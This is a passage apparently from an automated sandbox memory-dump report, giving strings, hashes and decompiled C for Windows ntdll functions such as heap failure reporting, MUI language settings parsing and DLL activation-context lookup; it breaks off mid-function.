The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 018BB323
*** enter .cxr %p for the context, xrefs: 018BB50D
The resource is owned shared by %d threads, xrefs: 018BB37E
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 018BB39B
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 018BB3D6
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 018BB314
*** An Access Violation occurred in %ws:%s, xrefs: 018BB48F
This failed because of error %Ix., xrefs: 018BB446
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 018BB47D
<unknown>, xrefs: 018BB27E, 018BB2D1, 018BB350, 018BB399, 018BB417, 018BB48E
read from, xrefs: 018BB4AD, 018BB4B2
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 018BB2DC
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 018BB305
*** A stack buffer overrun occurred in %ws:%s, xrefs: 018BB2F3
The resource is owned exclusively by thread %p, xrefs: 018BB374
The instruction at %p referenced memory at %p., xrefs: 018BB432
*** Inpage error in %ws:%s, xrefs: 018BB418
a NULL pointer, xrefs: 018BB4E0

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: fce6d5790ec04483b3ed3c81b4d768bdff70f0cec60d0336408f3afde6d3d145
Instruction ID: b570ea4bf6ca77904634ab9a33fe4a66a5fa7a6852aabb8b53824931f349d3a3
Opcode Fuzzy Hash: fce6d5790ec04483b3ed3c81b4d768bdff70f0cec60d0336408f3afde6d3d145
Instruction Fuzzy Hash: F88102B1A00200FFDB266B4ACCD5EAF7FA6AF5AB55F05004DF604AB322D2658741D672

Uniqueness

Uniqueness Score: -1.00%

Function 018C1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E018C1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17e48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0180B150();
				} else {
					E0180B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x18f589c);
				E0180B150("Heap error detected at %p (heap handle %p)\n",  *0x18f58a0);
				_t27 =  *0x18f5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M018C1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0180B150();
				} else {
					E0180B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0180B150("Error code: %d - %s\n",  *0x18f5898);
				_t113 =  *0x18f58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0180B150();
					} else {
						E0180B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0180B150("Parameter1: %p\n",  *0x18f58a4);
				}
				_t115 =  *0x18f58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0180B150();
					} else {
						E0180B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0180B150("Parameter2: %p\n",  *0x18f58a8);
				}
				_t117 =  *0x18f58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0180B150();
					} else {
						E0180B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0180B150("Parameter3: %p\n",  *0x18f58ac);
				}
				_t119 =  *0x18f58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0180B150();
					} else {
						E0180B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18f58b4);
					E0180B150("Last known valid blocks: before - %p, after - %p\n",  *0x18f58b0);
				} else {
					_t120 =  *0x18f58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0180B150();
				} else {
					E0180B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0180B150("Stack trace available at %p\n", 0x18f58c0);
			}

0x018c1c10
0x018c1c16
0x018c1c1e
0x018c1c3d
0x018c1c3e
0x018c1c20
0x018c1c35
0x018c1c3a
0x018c1c44
0x018c1c55
0x018c1c5a
0x018c1c65
0x018c1c67
0x00000000
0x018c1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x018c1c67
0x018c1cdc
0x018c1ce5
0x018c1d04
0x018c1d05
0x018c1ce7
0x018c1cfc
0x018c1d01
0x018c1d0b
0x018c1d17
0x018c1d1f
0x018c1d25
0x018c1d30
0x018c1d4f
0x018c1d50
0x018c1d32
0x018c1d47
0x018c1d4c
0x018c1d61
0x018c1d67
0x018c1d68
0x018c1d6e
0x018c1d79
0x018c1d98
0x018c1d99
0x018c1d7b
0x018c1d90
0x018c1d95
0x018c1daa
0x018c1db0
0x018c1db1
0x018c1db7
0x018c1dc2
0x018c1de1
0x018c1de2
0x018c1dc4
0x018c1dd9
0x018c1dde
0x018c1df3
0x018c1df9
0x018c1dfa
0x018c1e00
0x018c1e0a
0x018c1e13
0x018c1e32
0x018c1e33
0x018c1e15
0x018c1e2a
0x018c1e2f
0x018c1e39
0x018c1e4a
0x018c1e02
0x018c1e02
0x018c1e08
0x00000000
0x00000000
0x018c1e08
0x018c1e5b
0x018c1e7a
0x018c1e7b
0x018c1e5d
0x018c1e72
0x018c1e77
0x018c1e95

Strings

heap_failure_freelists_corruption, xrefs: 018C1CC9
HEAP[%wZ]: , xrefs: 018C1C30, 018C1CF7, 018C1D42, 018C1D8B, 018C1DD4, 018C1E25, 018C1E6D
Heap error detected at %p (heap handle %p), xrefs: 018C1C50
heap_failure_generic, xrefs: 018C1C7C
Stack trace available at %p, xrefs: 018C1E86
heap_failure_listentry_corruption, xrefs: 018C1CD0
heap_failure_multiple_entries_corruption, xrefs: 018C1C8A
Error code: %d - %s, xrefs: 018C1D12
Parameter3: %p, xrefs: 018C1DEE
HEAP: , xrefs: 018C1C16, 018C1C3D, 018C1D04, 018C1D4F, 018C1D98, 018C1DE1, 018C1E32, 018C1E7A
heap_failure_invalid_argument, xrefs: 018C1CAD
Last known valid blocks: before - %p, after - %p, xrefs: 018C1E45
heap_failure_invalid_allocation_type, xrefs: 018C1CB4
heap_failure_entry_corruption, xrefs: 018C1C83
heap_failure_buffer_overrun, xrefs: 018C1C98
heap_failure_cross_heap_operation, xrefs: 018C1CC2
heap_failure_virtual_block_corruption, xrefs: 018C1C91
heap_failure_block_not_busy, xrefs: 018C1CA6
heap_failure_lfh_bitmap_mismatch, xrefs: 018C1CD7
heap_failure_buffer_underrun, xrefs: 018C1C9F
heap_failure_internal, xrefs: 018C1C6E
heap_failure_usage_after_free, xrefs: 018C1CBB
Parameter1: %p, xrefs: 018C1D5C
heap_failure_unknown, xrefs: 018C1C75
Parameter2: %p, xrefs: 018C1DA5

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 5efb8bf51dcd635a0074b2a89b3e2f5f60a41f9df4df04a87165507a13c28674
Instruction ID: 6221c4a083ada3a3d698a786aa95614fbbedfaae27184e8164d103971c99b4f0
Opcode Fuzzy Hash: 5efb8bf51dcd635a0074b2a89b3e2f5f60a41f9df4df04a87165507a13c28674
Instruction Fuzzy Hash: 1E617336525549DFD362A749D8DCD26B3E4EB18F20B0A807EF609DB352DA34DB408F1A

Uniqueness

Uniqueness Score: -1.00%

Function 01813D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01813D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01811B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01811B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01811B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01811B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01811B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01824620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0184F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01851370(_t276, 0x17e4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0184BB40(0,  &_v68, _t170);
									if(L018143C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0184BB40(_t257,  &_v68, _t243);
								if(L018143C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01851370(_t278, 0x17e4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01824620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0184F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01851370(_v16, 0x17e4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0184BB40(_t262,  &_v68, _t244);
								if(L018143C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01851370(_t282, 0x17e4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0184BB40(_t262,  &_v68, _t201);
							if(L018143C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01824620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0184F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01851370(_t280, 0x17e4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0184BB40(_t267,  &_v68, _t245);
							if(L018143C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01851370(_t284, 0x17e4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0184BB40(_t267,  &_v68, _t224);
						if(L018143C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01813d3c
0x01813d42
0x01813d44
0x01813d46
0x01813d49
0x01813d4c
0x01813d4f
0x01813d52
0x01813d55
0x01813d58
0x01813d5b
0x01813d5f
0x01813d61
0x01813d66
0x01868213
0x01868218
0x01814085
0x01814088
0x0181408e
0x01814094
0x0181409a
0x018140a0
0x018140a6
0x018140a9
0x018140af
0x018140b6
0x018140bd
0x018140bd
0x01813d83
0x0186821f
0x01868229
0x01868238
0x01868238
0x0186823d
0x0186823d
0x01813da0
0x01813daf
0x01813db5
0x01813dba
0x01813dba
0x01813dd4
0x01813e94
0x01813eab
0x01813f6d
0x01813f84
0x0181406b
0x0181406b
0x0181406e
0x0181406e
0x01814070
0x01814074
0x01868351
0x01868351
0x0181407a
0x0181407f
0x0186835d
0x01868370
0x01868377
0x01868379
0x0186837c
0x0186837c
0x0186835d
0x00000000
0x0181407f
0x01813f8a
0x01813f8d
0x01813f90
0x01813f95
0x0186830d
0x0186830f
0x01813f9b
0x01813fac
0x01813fae
0x01813fb1
0x01813fb1
0x01813fb6
0x01868317
0x0186831a
0x00000000
0x01813fbc
0x01813fc1
0x01813fc9
0x01813fd7
0x01813fda
0x01813fdd
0x01814021
0x01814021
0x01814029
0x01814030
0x01814044
0x01814046
0x01814046
0x01814044
0x01814049
0x01868327
0x01868334
0x01868339
0x0186833c
0x0181404f
0x0181404f
0x0181404f
0x01814051
0x01814056
0x01814063
0x01814063
0x01814068
0x00000000
0x01814068
0x01813fdf
0x01813fe2
0x01813fe4
0x01813fe7
0x01813fef
0x01814003
0x01814005
0x01814005
0x0181400c
0x01814013
0x01814016
0x01814017
0x0181401b
0x0181401e
0x00000000
0x0181401e
0x01813fb6
0x01813eb1
0x01813eb4
0x01813eb7
0x01813ebc
0x018682a9
0x018682ab
0x01813ec2
0x01813ed3
0x01813ed5
0x01813ed8
0x01813ed8
0x01813edd
0x018682b3
0x018682b6
0x00000000
0x01813ee3
0x01813ee8
0x01813eed
0x01813ef0
0x01813ef3
0x01813f02
0x01813f05
0x01813f08
0x018682c0
0x018682c3
0x018682c5
0x018682c8
0x018682d0
0x018682e4
0x018682e6
0x018682e6
0x018682ed
0x018682f4
0x018682f7
0x018682f8
0x018682fc
0x018682ff
0x018682ff
0x01813f0e
0x01813f11
0x01813f16
0x01813f1d
0x01813f31
0x01868307
0x01868307
0x01813f31
0x01813f39
0x01813f48
0x01813f4d
0x01813f50
0x01813f50
0x01813f53
0x01813f58
0x01813f65
0x01813f65
0x01813f6a
0x00000000
0x01813f6a
0x01813edd
0x01813dda
0x01813ddd
0x01813de0
0x01813de5
0x01868245
0x01813deb
0x01813df7
0x01813dfc
0x01813dfe
0x01813e01
0x01813e01
0x01813e06
0x0186824d
0x0186824f
0x01868254
0x00000000
0x01813e0c
0x01813e11
0x01813e16
0x01813e19
0x01813e29
0x01813e2c
0x01813e2f
0x0186825c
0x0186825f
0x01868261
0x01868264
0x0186826c
0x01868280
0x01868282
0x01868282
0x01868289
0x01868290
0x01868293
0x01868294
0x01868298
0x0186829b
0x0186829b
0x01813e35
0x01813e38
0x01813e3d
0x01813e44
0x01813e58
0x018682a3
0x018682a3
0x01813e58
0x01813e60
0x01813e6f
0x01813e74
0x01813e77
0x01813e77
0x01813e7a
0x01813e7f
0x01813e8c
0x01813e8c
0x01813e91
0x00000000
0x01813e91

Strings

WindowsExcludedProcs, xrefs: 01813D6F
Kernel-MUI-Language-SKU, xrefs: 01813F70
Kernel-MUI-Language-Allowed, xrefs: 01813DC0
Kernel-MUI-Language-Disallowed, xrefs: 01813E97
Kernel-MUI-Number-Allowed, xrefs: 01813D8C

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 503435acbe00d8ce34b0c5241cb962d81be7699a2a38c4b46eaf0f1f06cec2bc
Instruction ID: b3f21afa87d89a1c0501b36d1bc27737da1aa6ad03813b37f9ea9be15d48ab78
Opcode Fuzzy Hash: 503435acbe00d8ce34b0c5241cb962d81be7699a2a38c4b46eaf0f1f06cec2bc
Instruction Fuzzy Hash: 5DF129B2D00619ABCB12DF99C980AAEBBBDFF19750F14006AE905E7255D7349B01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01838E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01838E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x18fd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x18f8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x18f5780 & 0x00000003) != 0) {
							E01885510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x18f5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0184B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x18f7984; // 0x13b2b18
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x18f8464; // 0x73b80110
					 *0x18fb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01839B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x18f5780 & 0x00000005) != 0) {
						_push(_t49);
						E01885510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01838e0f
0x01838e16
0x01838e19
0x01838e1b
0x01838e21
0x01838e7f
0x01838e85
0x01879354
0x0187936c
0x01879371
0x0187937b
0x01879381
0x01879381
0x0187937b
0x01838e9d
0x01838e9d
0x01838e29
0x01838e2c
0x01838e38
0x01838e3e
0x01838e43
0x01838eb5
0x01838eb9
0x018792aa
0x018792af
0x018792e8
0x018792e8
0x018792af
0x01838eb9
0x01838e45
0x01838e53
0x01838e5b
0x01838e5f
0x01838e78
0x01838e78
0x01838e7d
0x01838ec3
0x01838ecd
0x01838ed2
0x01838ed2
0x01838ec5
0x01838ec5
0x00000000
0x01838e7d
0x01838e67
0x01838ea4
0x0187931a
0x00000000
0x00000000
0x01879320
0x01838ea4
0x01838e70
0x01879325
0x01879340
0x01879345
0x01879345
0x01838e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0187933B, 01879367
LdrpFindDllActivationContext, xrefs: 01879331, 0187935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01879357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0187932A

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 1a93fedf09d52b578f207a66b787f4fb36239412ace36fefe24294ac87b626aa
Instruction ID: 19c175a598c964374fc344e0519facc013180bb9db93e2d9b7e2b5e3de7a47d4
Opcode Fuzzy Hash: 1a93fedf09d52b578f207a66b787f4fb36239412ace36fefe24294ac87b626aa
Instruction Fuzzy Hash: 0C412931A003159FEB36AA1CC888E35B7B4AB86318F0D472DF914D7151EB70AF8087E1

Uniqueness

Uniqueness Score: -1.00%

Function 01818794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01818794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0181934A() != 0) {
								_t159 = E0188A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x18f5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
